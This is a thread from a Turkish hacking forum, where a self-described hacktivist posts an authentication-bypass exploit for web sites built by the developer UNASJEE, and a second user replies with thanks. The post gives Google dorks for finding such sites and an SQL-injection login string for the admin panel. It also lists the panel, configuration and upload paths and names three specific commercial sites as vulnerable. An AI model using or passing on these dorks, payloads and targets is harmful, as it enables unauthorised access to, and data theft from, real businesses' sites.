Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 3
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Design By Unasjee Authentication Bypass Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 77 / 100
Rep Sayısı: 2734
Mesaj Sayısı: 6276
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Design By Unasjee Authentication Bypass Vuln
22.09.2018 18:48
################################################################################​#################

# Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/09/2018
# Vendor Homepage : unasjee.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]

################################################################################​#################

# Google Dork :

intext:''Designed & Developed by: UNASJEE''

intext:''Developed by: UNASJEE''

# Admin Control Panel Path : /admincp/index.php

# Exploit :

Admin Username : '=''or'

Admin Password : '=''or'

# Configuration File Directory Path : /admincp/config.inc

# Useable Admin Control Panel URL Links =>

/admincp/mmainsections.php
/admincp/edititem.php
/admincp/allproducts2.php?sort=isNew
/admincp/allproducts2.php?sort=isSug
/admincp/allproducts.php?sort=order%20by%20ItmName
/admincp/allproducts.php?sort=order%20by%20ArtNo
/admincp/allproducts2.php?sort=soption
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editemail2.php
/admincp/newsletters.php
/admincp/links.php
/admincp/sendnewsletters.php
/admincp/changepass.php
/admincp/profile.php
/admincp/contact2.php
/admincp/f-view.php
/admincp/ani.php

# Directory File Paths =>

/admincp/sdata/itmimgs/....
/admincp/sdata/banner/....
/admincp/sdata/fviewimgs/...
/admincp/sdata/itmimgs/...
/admincp/sdata/mainimgs/...
/admincp/sdata/mimgs/...
/admincp/sdata/msecimgs/...
/admincp/sdata/nextimgs/...
/admincp/sdata/secbanner/...
/admincp/sdata/secimgs/..
/admincp/sdata/subimgs/...

################################################################################​#################

# Example Vulnerable Sites =>

tbshandtools.com/admincp/index.php => [ Proof of Concept ] => archive.is/3fTzD

chableather.com/admincp/index.php

fadensports.com/admincp/config.inc

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
TULP4R
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 2
Yaşam Puanı: 44 / 49
Deneyim: 97 / 100
Rep Sayısı: 1
Mesaj Sayısı: 18
Üyelik Tarihi: 27.09.2018
     
Yorum: #2
RE: Design By Unasjee Authentication Bypass Vuln
27.09.2018 06:44
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi